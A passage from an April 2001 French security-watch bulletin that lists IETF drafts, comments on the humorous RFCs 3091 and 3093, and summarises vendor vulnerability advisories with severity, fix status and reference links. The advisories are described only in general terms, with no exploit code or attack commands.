draft-nickless-ipv4-mcast-bcp-01 06/04 IPv4 Multicast Best Current Practice<br />
draft-welzl-opt-lookup-00 22/03 IP Fast Option Lookup<br />
IPCDN draft-ietf-ipcdn-dvbdev-mib-00 03/04 DVB Cable Interactive Network Adapter Device MIB<br />
draft-ietf-ipcdn-dvbinaif-mib-00 03/04 DVB Cable Interactive Network Adapter Interface MIB<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 17/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
IPP draft-ietf-ipp-indp-method-05 12/04 IPP: The 'indp' Delivery Method for Event Notifications & Protocol<br />
draft-ietf-ipp-install-03 12/04 IPP: Printer Installation Extension<br />
draft-ietf-ipp-notify-get-03 12/04 EPP: The 'ippget' Delivery Method for Event Notifications<br />
draft-ietf-ipp-url-scheme-03 02/04 Internet Printing Protocol (IPP): IPP URL Scheme<br />
IPS draft-ietf-ips-fcencapsulation-00 20/04 FC Frame Encapsulation<br />
IPV6 draft-ietf-ipngwg-default-addr-select-03 29/03 Default Address Selection for IPv6<br />
draft-ietf-ipngwg-dns-discovery-01 22/03 Analysis of DNS Server Discovery Mechanisms for IPv6<br />
draft-ietf-ipngwg-ipv6-2260-01 12/04 IPv6 multihoming support at site exit routers<br />
draft-draves-ipngwg-router-selection-01 29/03 Default Router Preferences and More-Specific Routes<br />
draft-francis-ipngwg-site-def-00 02/04 IPv6 Site Definition<br />
draft-itojun-ipv6-flowlabel-api-01 11/04 Socket API for IPv6 flow label field<br />
draft-itojun-ipv6-local-experiment-02 03/04 Guidelines for IPv6 local experiments<br />
draft-itojun-ipv6-tclass-api-02 11/04 Socket API for IPv6 traffic class field<br />
draft-ietf-ngtrans-6to4anycast-03 22/03 An anycast prefix for 6to4 relay routers<br />
draft-ietf-ngtrans-ipv6-smtp-requirement-00 11/04 IPv6 SMTP operational requirements<br />
draft-ietf-ngtrans-tcpudp-relay-04 11/04 An IPv6-to-IPv4 transport relay translator<br />
ISCSI draft-ietf-ips-iscsi-06 20/04 ISCSI<br />
draft-ietf-ips-iscsi-mib-00 20/04 Definitions of Managed Objects for iSCSI<br />
draft-ietf-ips-iscsi-name-disc-01 20/04 ISCSI Naming and Discovery Requirements<br />
draft-ietf-ips-iscsi-slp-00 20/04 Finding iSCSI Targets and Name Servers Using SLP<br />
draft-otis-iscsi-fullack-00 20/04 ISCSI Full Acknowledgement<br />
ISIS draft-ietf-isis-ipv6-02 02/04 Routing IPv6 with IS-IS<br />
draft-shand-isis-restart-00 02/04 Restart signaling for ISIS<br />
ISNS draft-ietf-ips-isns-02 20/04 ISNS Internet Storage Name Service<br />
ISP draft-penno-isp-selection-00 04/04 ISP Selection in Open Access Networks<br />
L2TP draft-elwin-l2tpext-diffserv-00 09/04 Differentiated Services on L2TP Sessions<br />
draft-ietf-l2tpext-ppp-discinfo-03 05/04 L2TP Disconnect Cause Information<br />
LDAP draft-ietf-ldapbis-dn-03 03/04 LDAPv3: UTF-8 String Representation of Distinguished Names<br />
draft-zeilenga-ldapbis-vd-02 03/04 Lightweight Directory Access Protocol: version differences<br />
MBONE Draft-ietf-mboned-glop-extensions-01 11/04 Extended Allocations in 233/8<br />
draft-ietf-mboned-iana-ipv4-mcast-guidelines-00 29/03 IANA Guidelines for IPv4 Multicast Address Allocation<br />
draft-ietf-mboned-ssm232-01 03/04 Source-Specific Protocol Independent Multicast in 232/8<br />
MIB draft-schoenw-rfc-2593-update-02 12/04 Script MIB Extensibility Protocol Version 1.1<br />
MIDCOM draft-ietf-midcom-scenarios-00 02/04 MIDCOM Scenarios<br />
MIDDLE draft-lear-middlebox-discovery-requirements-00 05/04 Requirements for Discovering Middleboxes<br />
MIME draft-eastlake-ip-mime-05 05/04 IP over MIME<br />
draft-herriot-application-batchbeep-00 29/03 The MIME Application/BatchBeep Content-type<br />
draft-herriot-multipart-interleaved-00 29/03 MIME Multipart/Interleaved & Application/Chunk Content-types<br />
draft-ietf-msgtrk-trkstat-01 23/03 The Message/Tracking-Status MIME Extension<br />
draft-nussbacher-bourvine-hebrew-email-00 22/03 Hebrew Character Encoding for Internet Messages<br />
MOBILEIP draft-decarolis-qoshandover-02 09/04 QoS-Aware Handover for Mobile IP: Secondary Home Agent<br />
draft-ietf-mobileip-gnaie-02 04/04 Generalized NAI Extension (GNAIE)<br />
draft-ietf-mobileip-mier-06 02/04 Mobile IP Extensions Rationalization (MIER)<br />
draft-ietf-mobileip-reg-revok-00 13/04 Registration Revocation in Mobile IP<br />
MPLS draft-awduche-mpls-te-optical-03 06/04 Multi-Protocol Lambda Switching: Combining MPLS Traffic Engi …<br />
draft-ietf-mpls-ftn-mib-01 02/04 MPLS FEC-To-NHLFE (FTN) MIB Using SMIv2<br />
draft-ietf-mpls-ldp-state-04 29/03 LDP State Machine<br />
draft-ietf-mpls-rsvp-tunnel-applicability-02 09/04 Applicability Statement for Extensions to RSVP for LSP-Tunnels<br />
draft-shah-mpls-l2vpn-reduce-00 22/03 Reducing over-provisioning for MPLS based L2VPN<br />
draft-suraev-mpls-globl-recov-enhm-00 06/04 Global path recovery enhancement using Notify Reverse LSP<br />
draft-tommasi-mpls-intserv-00 29/03 Integrated Services across MPLS domains using CR-LDP signaling<br />
MSDP draft-ietf-msdp-spec-08 03/04 Multicast Source Discovery Protocol (MSDP)<br />
MULTI6 draft-ietf-multi6-multihoming-requirements-00 22/03 Requirements for IP Multihoming Architectures<br />
NAS draft-foster-mgcp-nas-00 23/03 NAS packages for MGCP<br />
NDMP draft-skardal-ndmpv4-02 09/04 Network Data Management Protocol Version 4<br />
NFS draft-rangan-nfsv4-mib-00 23/03 NFS version 4 MIB for Server Implementations<br />
NNTP draft-ietf-nntpext-base-13 02/04 Network News Transport Protocol<br />
NTP draft-ietf-usefor-article-04 06/04 News Article Format<br />
OPP draft-jseng-provreg-opp-00 11/04 Object Provisioning Protocol (OPP)<br />
PPP draft-ietf-pppext-aodi-03 11/04 Always On Dynamic ISDN (AODI).<br />
draft-ietf-pppext-posvcholo-03 09/04 Extending PPP over SONET/SDH, with virtual concatenation, …<br />
PPPOE draft-penno-pppoe-ext-service-01 04/04 PPPoE Extensions For Seamless Service Selection<br />
RDMA draft-csapuntz-caserdma-00 22/03 The Case for RDMA<br />
RMON draft-ietf-rmonmib-iftopn-mib-05 30/03 RMON MIB Extensions for Interface Parameters Monitoring<br />
ROHC draft-ietf-rohc-tcp-taroc-01 22/03 TCP-Aware RObust Header Compression (TAROC)<br />
RSERPOO draft-ietf-rserpool-arch-00 03/04 Architecture for Reliable Server Pooling<br />
draft-ietf-rserpool-reqts-02 03/04 Requirements for Reliable Server Pooling<br />
RSVP draft-ietf-issll-rsvp-aggr-04 09/04 RSVP Reservations Aggregation<br />
RTP draft-gentric-avt-mpeg4-multisl-03 06/04 RTP Payload Format for MPEG-4 Streams<br />
SCMP draft-arnold-scmp-08 30/03 Simple Commerce Messaging Protocol V1 Message Specification<br />
SCRIBE draft-liu-rohc-scribe-00 23/03 Scalable Robust Efficient Dictionary-Based Compression (SCRIBE)<br />
SCTP draft-ietf-tsvwg-usctp-00 04/04 SCTP Unreliable Data Mode Extension<br />
SDP draft-ietf-mmusic-fid-01 03/04 The SDP fid attribute<br />
SEAMOBY draft-hamid-seamoby-ct-reqs-01 30/03 General Requirements for a Context Transfer Framework<br />
SIEVE draft-segmuller-sieve-relation-00 10/04 Sieve Extension: Relational Tests<br />
SIGTRAN draft-ietf-sigtran-sctp-applicability-06 10/04 Stream Control Transmission Protocol Applicability Statement<br />
draft-ong-sigtran-sctpover-01 05/04 An Overview of the SCTP<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 18/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
SIP draft-ietf-simple-im-00 12/04 SIP Extensions for Instant Messaging<br />
draft-ietf-simple-presence-00 02/04 SIP Extensions for Presence<br />
draft-ietf-sip-call-flows-04 02/04 SIP Telephony Call Flow Examples<br />
draft-ietf-sip-dhcp-04 29/03 DHCP Option for SIP Servers<br />
draft-ietf-sip-isup-mime-09 23/03 MIME media types for ISUP and QSIG Objects<br />
draft-ietf-sip-srv-02 29/03 SIP: Session Initiation Protocol -- Locating SIP Servers<br />
draft-petrie-sip-config-framework-00 22/03 A Framework for SIP User Agent Configuration<br />
draft-schulzrinne-sip-911-01 29/03 Providing Emergency Call Svc for SIP-based Internet Telephony<br />
SMB draft-crhertel-smb-url-00 11/04 SMB Filesharing URL Scheme<br />
SMIME draft-ietf-smime-ecc-04 30/03 Use of ECC Algorithms in CMS<br />
draft-ietf-smime-pkcs1-00 29/03 Preventing the Million Message Attack on CMS<br />
SMTP draft-ietf-msgtrk-smtpext-01 23/03 SMTP Service Extension for Message Tracking<br />
SNMP draft-irtf-nmrg-snmp-compression-01 11/04 SNMP Payload Compression<br />
SVRLOC draft-day-svrloc-exclusion-01 22/03 Exclusion Extension for Service Location Protocol v2<br />
TATU draft-cameron-tatu-bibp-03 09/04 Biblio. Protocol Level1: Link Resolution & Metapage Retrieval<br />
TCP draft-bahk-pilc-tcp-wireless-00 09/04 Spurring TCP retransmission upon wireless uplink losses<br />
TEWG draft-ietf-tewg-framework-03 05/04 A Framework for Internet Traffic Engineering<br />
TFRC draft-guo-tsvwg-ctfrc-00 04/04 CTFRC: An enhanced version of TFRC Protocol Specification<br />
TFTP draft-schulzrinne-tftp-url-00 29/03 The tftp URL Scheme<br />
ULP draft-williams-tcpulpframe-01 22/03 ULP Framing for TCP<br />
URN draft-ietf-urn-net-procedures-07 29/03 Assignment Procedures for the URI Resolution using DNS<br />
USP draft-shemsedinov-usp-01 22/03 Universal Service Protocol<br />
VCDIFF draft-korn-vcdiff-03 03/04 The VCDIFF Generic Differencing and Compression Data Format<br />
VPIM draft-ietf-vpim-cc-04 02/04 Critical Content of Internet Mail<br />
WHOIS draft-wesson-whois-export-03 10/04 Whois Export and Exchange Format<br />
XML draft-blake-wilson-xmldsig-ecdsa-02 30/03 ECDSA with XML-Signature Syntax<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 19/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
NOS COMMENTAIRES<br />
LES RFC<br />
RFC 3091<br />
Pi Digit Generation Protocol<br />
Ce standard IETF de 6 pages paru en tout début de mois décrit une implémentation (objets ASCII et protocoles) de<br />
génération de caractères ASCII numériques de type Chargen et appelée PIgen.<br />
Un tel système permet de diffuser des valeurs numériques correspondant à des décimales de la valeur Pi de façon<br />
précise ou approximative soit par une application basée sur TCP en mode connecté, soit sur UDP en mode non<br />
connecté, soit en mode multicast.<br />
Sous TCP, l’application génère de façon périodique les décimales. Notons que la valeur entière ("3") n’est pas<br />
générée, car considérée connue de tous. Sous UDP, il s’agit d’un mode de type question/réponse. La requête émise<br />
doit contenir le numéro de la décimale de Pi requise. La réponse contient 3 éléments : le numéro de la décimale, un<br />
symbole ":" et la valeur de la décimale requise.<br />
Dans le service de génération dit "précis", le port applicatif est fixe et est égal à 31415.<br />
Dans le service de génération dit "approché (ou approximate)", le port applicatif est fixe et est égal à 22007. cette<br />
valeur est, semble-t-il, faite pour rappeler de façon mnémotechnique que le calcul approximé est basé sur le calcul<br />
de la division de la valeur "22" par "7".<br />
Dans le service en mode de diffusion, l’application utilise le protocol UDP et diffuse des blocs aléatoires de valeurs<br />
numériques correspondant à des décimales de Pi. Le groupe de multicast utilisé est 314.159.265.359.<br />
Ce document a pour particularité de contenir au moins 2 éléments que nous nous permettons de qualifier<br />
d’imprécisions majeures.<br />
La première concerne le calcul en mode dit "approximate". En effet, il aurait été préférable de se baser sur la division<br />
de "333" par "106", plus précise, qui a pour mérite de fournir les 4 premières décimales correctes (au lieu de 2 dans<br />
le cas proposé dans la RFC). Dans la logique de la RFC, le port applicatif à utiliser serait plutôt le 333106, tant en<br />
TCP qu’en UDP.<br />
La seconde concerne le choix de l’adresse de multicast et posera sans doute des problèmes d’implémentation. En<br />
effet, il n’est pas précisé quelle était la classe de cette adresse de diffusion : il s’agit d’une erreur surprenante de la<br />
part de l’IETF sachant que 3 des 4 valeurs numériques de cette adresse sont hors normes …<br />
D'une lecture pourtant simple et compréhensible par la plupart des internautes, il s'agit d'un RFC dont on ne risque<br />
pas de voir le contenu implémenté tant que les imprécisions ne seront pas corrigées. Comme il est rappelé dans la<br />
partie "Security Considerations" de ce RFC, il est impératif de se baser sur des serveurs fiables implémentant le<br />
protocole Pigen, car "the imminent collapse of the Internet is assured if this guideline is not strictly followed"<br />
Le lecteur voulant réaliser sa propre implémentation du protocole pourra d’ailleurs trouver des éléments concernants<br />
les décimales de Pi sur le site http://pi.super-computing.org<br />
ftp://ftp.isi.edu/in-notes/rfc3091.txt<br />
RFC 3093<br />
Firewall Enhancement Protocol (FEP)<br />
Ce standard IETF de 11 pages paru lui aussi en tout début de mois décrit une implémentation permettant de<br />
véhiculer tout datagramme TCP ou UDP au sein du protocole HTTP.<br />
L’encapsulation dans le protocole HTTP (TCP sur le port 80) qui passe de façon transparente la quasi totalité des<br />
firewalls du marché, permettrait de véhiculer n’importe quelle application, même les plus complexes qui utilisent des<br />
ports appplicatifs utilisés de façon aléatoire.<br />
Il faut savoir que l’un des auteurs de ce RFC est le célèbre Scott Bradner de l’Université de Harvard, et qu’il semble<br />
avoir usé de sa notoriété pour convaincre les différents vendeurs de gardes barrières d’implémenter sous peu ce<br />
protocole, dont le sigle (FEP) en rappellera sans doute un autre aux personnes ayant travaillé il y a une dizaine<br />
d’années dans le domaine des réseaux (Front End Processor).<br />
Notons que bien qu'il ne s'agisse ici que d'un texte humoristique, le mécanisme présenté est 'hélas' d'ores et déjà<br />
utilisé dans le but de court-circuiter les filtres de sécurité mis en place !<br />
ftp://ftp.isi.edu/in-notes/rfc3093.txt<br />
LES DRAFTS<br />
DRAFT-MONTENEGRO-SUCV-00.TXT<br />
Statistically Unique and Cryptographically Verifiable Identifiers and Addresses<br />
Cette proposition de standard répond au problème de la propriété de l'identifiant dans le monde du "mobile IP" dans<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 20/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
IPv6, en l'absence d'une tierce partie de confiance. L'utilisation d'éléments ayant des propriétés de "Statistiquement<br />
Unique et Cryptographiquement Vérifiable" (Statistically Unique and Cryptographically Verifiable) est suggérée<br />
pour les identificateurs (SUCV ID's) mais aussi pour les adresses (SUCV Addresses). L'objectif est de parer les<br />
attaques de type DoS (Denial of Service) ou de "hijacking" et ainsi de redorer le 'Blason' de Mobile IP mis à mal<br />
dernièrement.<br />
SUCV Addresses veut répondre aux problèmes de confiance qui se posent dans le domaine du "Mobile IPv6"<br />
lorsque l'on met en œuvre <strong>cert</strong>ains mécanismes comme par exemple le "Binding Updates". En effet dans ce<br />
mécanisme, c'est le nœud mobile authentifié qui met à jour la table de routage de l'agent.<br />
Dans cette proposition, on admet qu'aucun nœud ne fait confiance aux autres et que l'on ne dispose ni d'une<br />
Infrastructure à Clé Publique (ICP ou IGC), ni d'un Centre de Distribution de Clé (Key Distribution Center). Dans une<br />
telle configuration, comment un nœud peut-il prouver son identité ?<br />
En utilisant les caractéristiques 'SUCV', l'entité va générer elle-même un bi-clé (clé publique et clé privée associée)<br />
et signer sa clé publique, qui représente son identité, avec sa clé privée.<br />
SUCV ID's est le condensé du SUCV et est plus simple à utiliser au niveau protocolaire car il est de taille fixe. Ainsi,<br />
on peut être sûr que cette information d'identité est unique pour chaque nœud.<br />
Mais cette notion de SUCV ID's ne donne aucune information sur l'adresse. D'où l'introduction du SUCV Addresses<br />
sur 128 bits qui respecte les caractéristiques 'SUCV' et se compose pour la première partie de 64 bits correspondant<br />
au préfixe de routage et pour la seconde partie de 64 bits, 63 bits pour le SUCV ID appelé condensé de l'ID (HID)<br />
et 1 bit pour le "local/universal bit".<br />
Une description succincte du protocole est faite dans la proposition ainsi que l'environnement d'application.<br />
ftp://ftp.nordu.net/internet-drafts/ draft-montenegro-sucv-00.txt<br />
http://www.idg.net/ic_497484_1794_9-10000.html<br />
DRAFT-BOSE-SMTP-INTEGRITY-00<br />
Checking of Message Integrity during SMTP Transactions<br />
Ce draft propose une extension au protocole SMTP permettant de vérifier l’intégrité des messages reçus et de<br />
demander le cas échéant le renvoi du message.<br />
Le protocole SMTP (RFC 821) ne défini aucun mécanisme de vérification des messages lors de leur envoi à travers<br />
le réseau, ce qui implique le traitement manuel des messages endommagés par le destinataire.<br />
L’extension proposée nécessite peu de modification des logiciels<br />
clients/serveurs et permet un traitement automatique des<br />
erreurs de transmission.<br />
La méthode consiste à insérer un header 'checksum' au début<br />
du corps du message, contenant le checksum du contenu du<br />
corps du message.<br />
valeur_checksum<br />
.... corps du message d’origine ....<br />
Réception SMTP<br />
Commande<br />
checksum ?<br />
Support<br />
checksum ?<br />
502 Not implemented<br />
Le tag TYPE indique ici a taille en bits du checksum utilisé (16 ou 32)<br />
Chaque transfert de message donne lieu à une vérification du<br />
checksum. Lorsqu'une erreur est détectée, un nouvel envoi est<br />
demandé, le nombre de renvois étant idéalement limité à 2<br />
Réception data<br />
Réception data<br />
voire 4. Si toutes ces tentatives échouent, le mail est envoyé<br />
sans l’information 'checksum'.<br />
453 Checksum error Oui Erreur ?<br />
La demande de renvoi nécessite la création d’un nouveau code<br />
Non<br />
erreur : 453 Checksum does not match<br />
250 OK<br />
La compatibilité avec les équipements ne gérant pas la checksum serait assurée par l’ajout d’une commande<br />
« checksum » au protocole SMTP, permettant de déterminer si le serveur distant gère le mécanisme checksum.<br />
ftp://ftp.nordu.net/internet-drafts/draft-bose-smtp-integrity-00.txt<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 21/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE<br />
Oui<br />
Oui<br />
Non<br />
Non<br />
Pas de support checksum
Avril 2001<br />
ALERTES<br />
GUIDE DE LECTURE<br />
ALERTES ET ATTAQUES<br />
La lecture des avis publiés par les différents organismes de surveillance ou par les constructeurs n’est pas<br />
toujours aisée. En effet, les informations publiées peuvent être non seulement redondantes mais aussi<br />
transmises avec un retard conséquent par <strong>cert</strong>ains organismes. Dès lors, deux alternatives de mise en<br />
forme de ces informations peuvent être envisagées :<br />
Publier une synthèse des avis transmis durant la période de veille, en classant ceux-ci en fonction de<br />
l’origine de l’avis,<br />
Publier une synthèse des avis transmis en classant ceux-ci en fonction des cibles.<br />
La seconde alternative, pour séduisante quelle soit, ne peut être raisonnablement mise en œuvre étant<br />
donné l’actuelle diversité des systèmes impactés. En conséquence, nous nous proposons de maintenir une<br />
synthèse des avis classée par organisme émetteur de l’avis.<br />
Afin de faciliter la lecture de ceux-ci, nous proposons un guide de lecture sous la forme d'un synoptique<br />
résumant les caractéristiques de chacun des sources d’information ainsi que les relations existant entre ces<br />
sources. Seules les organismes, constructeurs ou éditeurs, disposant d’un service de notification officiel et<br />
publiquement accessible sont représentés.<br />
Avis Spécifiques Avis Généraux<br />
Constructeurs Editeurs Indépendants Organismes<br />
Réseaux Systèmes Systèmes Editeurs<br />
3Com Compaq<br />
Cisco<br />
HP<br />
IBM<br />
SGI<br />
SUN<br />
Linux<br />
FreeBSD<br />
NetBSD<br />
OpenBSD<br />
SCO<br />
Hackers Editeurs Autres<br />
Microsoft l0pht AXENT BugTraq CERT<br />
Netscape<br />
rootshell<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 22/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE<br />
ISS<br />
@Stake<br />
Typologies des informations publiées<br />
US Autres<br />
CIAC<br />
Publication de techniques et de programmes d’attaques<br />
Détails des alertes, techniques et programmes<br />
Synthèses générales, pointeurs sur les sites spécifiques<br />
Notifications détaillées et correctifs techniques<br />
Aus-CERT<br />
L’analyse des avis peut être ainsi menée selon les trois stratégies suivantes :<br />
Recherche d’informations générales et de tendances : Lecture des avis du CERT et du CIAC<br />
Maintenance des systèmes : Lecture des avis constructeurs associés<br />
Compréhension et anticipation des menaces : Lecture des avis des groupes indépendants<br />
3Com<br />
Cisco<br />
Compaq<br />
HP<br />
IBM<br />
SGI<br />
SUN<br />
Aus-CERT<br />
CERT<br />
Microsoft BugTraq rootshell AXENT<br />
Netscape<br />
CIAC<br />
@Stake<br />
l0pht<br />
ISS<br />
NetBSD<br />
OpenBSD<br />
Xfree86<br />
Linux<br />
FreeBSD
Avril 2001<br />
FORMAT DE LA PRESENTATION<br />
Les alertes et informations sont présentées classées par sources puis par niveau de gravité sous la forme<br />
de tableaux récapitulatifs constitués comme suit:<br />
Présentation des Alertes<br />
EDITEUR<br />
TITRE<br />
Description sommaire<br />
Gravité Date Informations concernant la plate-forme impactée<br />
Correction Produit visé par la vulnérabilité Description rapide de la source du problème<br />
Référence<br />
URL pointant sur la source la plus pertinente<br />
Présentation des Informations<br />
SOURCE<br />
TITRE<br />
Description sommaire<br />
URL pointant sur la source d'information<br />
SYNTHESE MENSUELLE<br />
Le tableau suivant propose un récapitulatif du nombre d’avis publiés pour la période courante, l’année en<br />
cours et l’année précédente. Ces informations sont mises à jour à la fin de chaque période de veille.<br />
L’attention du lecteur est attirée sur le fait que <strong>cert</strong>ains avis sont repris et rediffusés par les différents<br />
organismes. Ces chiffres ne sont donc représentatifs qu’en terme de tendance et d’évolution.<br />
Période du 23/03/2001 au 20/04/2001<br />
Cumul<br />
Période 2001 2000<br />
Organisme 17 59 118<br />
CERT-CA 3 8 22<br />
CERT-IN 1 3 10<br />
CIAC 13 48 86<br />
Constructeurs 9 35 77<br />
Cisco 4 9 13<br />
HP 2 16 28<br />
IBM 2 7 17<br />
SGI 1 1 12<br />
Sun 0 2 7<br />
Editeurs 7 28 155<br />
Allaire 0 2 32<br />
Microsoft 5 22 100<br />
Netscape 1 2 7<br />
Sco 1 2 16<br />
Unix libres 26 141 226<br />
Linux RedHat 10 27 137<br />
Linux Debian 6 42 66<br />
Linux Mandr. 6 40 --<br />
FreeBSD 4 32 23<br />
Autres 5 21 38<br />
@Stake 4 12 10<br />
Safer 1 5 1<br />
X-Force 0 4 27<br />
Cumul 2001 - Constructeurs<br />
IBM<br />
20%<br />
Netscape<br />
7%<br />
HP<br />
45%<br />
SGI<br />
3%<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 23/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE<br />
Sun<br />
6%<br />
Cumul 2001 - Editeurs<br />
Microsoft<br />
79%<br />
Sco<br />
7%<br />
Allaire<br />
7%<br />
Cisco<br />
26%<br />
Cumul 2000 - Constructeurs<br />
IBM<br />
22%<br />
SGI<br />
16%<br />
Sun<br />
9%<br />
HP<br />
36%<br />
Cumul 2000 - Editeurs<br />
Netscape<br />
5%<br />
Microsoft<br />
64%<br />
Sco<br />
10%<br />
Cisco<br />
17%<br />
Allaire<br />
21%
Avril 2001<br />
ALERTES DETAILLEES<br />
AVIS OFFICIELS<br />
Les tables suivantes présentent une synthèse des principales alertes de sécurité émises par un organisme<br />
fiable, par l’éditeur du produit ou par le constructeur de l’équipement. Ces informations peuvent être<br />
considérées comme fiables et authentifiées. En conséquence, les correctifs proposés, s'il y en a, doivent<br />
immédiatement être appliqués.<br />
AKOPIA<br />
Existence d'un compte d'accès libre sur 'Interchange'<br />
L'un des comptes d'accès livrés avec les bases de démonstration du logiciel de commerce électronique AKOPIA<br />
Interchange n'est pas protégé par un mot de passe.<br />
Forte 26/03 Toute plateforme utilisant AKOPIA Interchange versions4.5.3 à 4.6.3<br />
Correctif existant Bases de démo. Interchange Compte d'accès non protégé<br />
Bugtraq<br />
http://www.securityfocus.com/archive/1/170954<br />
ALCATEL<br />
Multiples vulnerabilités dans les modems ADSL Alcatel<br />
Le CERT publie, sous la référence CA-2001-08, une alerte faisant état de multiples vulnérabilités dans les modems<br />
ADSL Alcatel.<br />
Critique 10/04 Alcatel Speed Touch Home ADSL Modem, Alcatel 1000 ADSL Network Termination Device<br />
Aucun correctif Porte dérobée dans les modems Accès à l'interface<br />
Transfert<br />
http://www.transfert.net/fr/cyber_societe/article.cfm?idx_rub=87&idx_art=5090<br />
CA-2001-08 http://www.<strong>cert</strong>.org/advisories/CA-2001-08.html<br />
Vnunet<br />
http://www.vnunet.fr/actu/article.htm?numero=6197&date=2000-11-06<br />
FA-2001-08 http://www2.fedcirc.gov/advisories/FA-2001-08.html<br />
BEA<br />
Exposition des scripts '.jsp' sous 'WebLogic'<br />
En soumettant une url particulière à un serveur 'WebLogic', il est possible d'afficher la source des scripts JSP.<br />
Critique 28/03 WebLogic 5.1.0 SP 6 et Tomcat 4.0-b1 (version courante: 5.1SP8)<br />
Correctif existant Caractères unicode Non rejet d'URL contenant <strong>cert</strong>ains caractères unicode<br />
Bugtraq<br />
http://www.securityfocus.com/archive/1/172621<br />
BEA<br />
http://commerce.bea.com/downloads/weblogic_server.jsp#wls<br />
Vulnérabilité unicode dans 'Weblogic'<br />
Une vulnérabilité dans 'Weblogic Server 6.0' peut conduire un utilisateur à visualiser le contenu des répertoires.<br />
Forte 26/03 Bea Weblogic Server 6.0 pour Windows NT/2000 (version courante: 6.0SP1)<br />
Correctif existant Caractères unicode Non rejet d'URL contenant <strong>cert</strong>ains caractères unicode<br />
Bugtraq<br />
http://www.securityfocus.com/archive/1/171401<br />
BEA<br />
http://commerce.bea.com/downloads/weblogic_server.jsp#wls<br />
CISCO<br />
Vulnérabilité des concentrateurs 'Cisco VPN 3000'<br />
Il est possible de redémarrer un concentrateur Cisco VPN de la série 3000 en envoyant un flot de données au port<br />
SSL ou telnet.<br />
Forte 28/03 Cisco VPN série 3000 avec firmware inférieur à la version 3.0.00 (modèles 3005, 3015, 3030, 3060 et 3080)<br />
Correctif existant Connexions SSL ou telnet Non fermeture des connexions<br />
CSCds90807 http://www.cisco.com/warp/public/707/vpn3k-telnet-vuln-pub.shtml<br />
Déni de service sur les concentrateurs 'VPN 3000'<br />
Il est possible de provoquer un déni de service distant, depuis un même segment de réseau local, sur les<br />
concentrateurs CISCO 'VPN 3000'.<br />
Forte 12/04 Cisco VPN série 3000 avec firmware inférieur à 2.5.2 (F) (modèles 3005, 3015, 3030, 3060 et 3080)<br />
Correctif existant Option des paquets IP Mauvaise gestion des paquets malformés<br />
CSCds92460 http://www.cisco.com/warp/public/707/vpn3k-ipoptions-vuln-pub.shtml<br />
Vulnérabilité dans les commutateurs 'CSS' (Arrowpoint)<br />
Un utilisateur non privilégié peut acquérir des droits plus élevés sur les commutateurs 'Cisco Content Services' aussi<br />
appelés 'Arrowpoint'.<br />
Forte 04/04 Cisco CSS 11050, 11150 et 11800 utilisant Cisco WebNS (Firmware versions inférieures à 4.01B19s).<br />
Correctif existant Mode 'debug' Possibilité de passer en mode superviseur<br />
CSCdt32570 http://www.cisco.com/warp/public/707/arrowpoint-useraccnt-debug-pub.shtml<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 24/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
Déni de service sur les commutateurs 'Catalyst 5000'<br />
Une vulnérabilité de type déni de service, exploitable à distance, affecte les commutateurs Cisco 'Catalyst 5000'.<br />
Forte 16/04 Cisco Catalyst série 5000 (modèles 5000, 5002, 5500, 5505,5509, 2901, 2902 et 2926) basés sur les<br />
versions EARL 1, 1+ et 1++ de Firmware versions 4.5 (11) ou inférieures, 5.5 (6) ou inférieures et 6.1 (2) ou<br />
inférieures.<br />
Correctif existant Port STP, trames 802.1x Non rejet des trames à destination d'un port STP bloqué<br />
CSCdt62732 http://www.cisco.com/warp/public/707/cat5k-8021x-vuln-pub.shtml<br />
COMPAQ<br />
Déni de service sur Presario via un ActiveX<br />
Il est possible d'écrire sur le disque dur d'une victime grâce à un contrôle ActiveX sur Compaq Presario.<br />
Moyenne 10/04 Microsoft Windows 98, Me<br />
Correctif existant Fonction 'LogDataListToFile' Ecrasement de fichier<br />
[SSRT0716] http://www.securityfocus.com/archive/1/175463<br />
FTP<br />
Débordement de buffer dans plusieurs serveurs 'ftp'<br />
Une vulnérabilité de type débordement de buffer, exploitable à distance, affecte plusieurs démons ftp.<br />
Critique 10/04 Services fournis avec FreeBSD 4.2, OpenBSD 2.8, NetBSD 1.5, HPUX 11, IRIX 6.5.x, Solaris 8, Fujitsu UXP/V.<br />
Proftpd et Microsoft FTP Service(version 5.0) sont aussi affectés.<br />
Correctif existant Fonction 'glob()' Débordement de buffer<br />
CA-2001-07 http://www.<strong>cert</strong>.org/advisories/CA-2001-07.html<br />
COVERT-2001-02 http://www.pgp.com/research/covert/advisories/048.asp<br />
FA-2001-07 http://www2.fedcirc.gov/advisories/FA-2001-07.html<br />
Gene6<br />
Vulnérabilités dans le serveur FTP G6 'bulletProof'<br />
Deux vulnérabilités dans le serveur FTP G6 'bulletProof' permet de collecter des informations sensibles sur les<br />
fichiers et les partages Netbios.<br />
Forte 04/04 G6 FTP Server version 2.0<br />
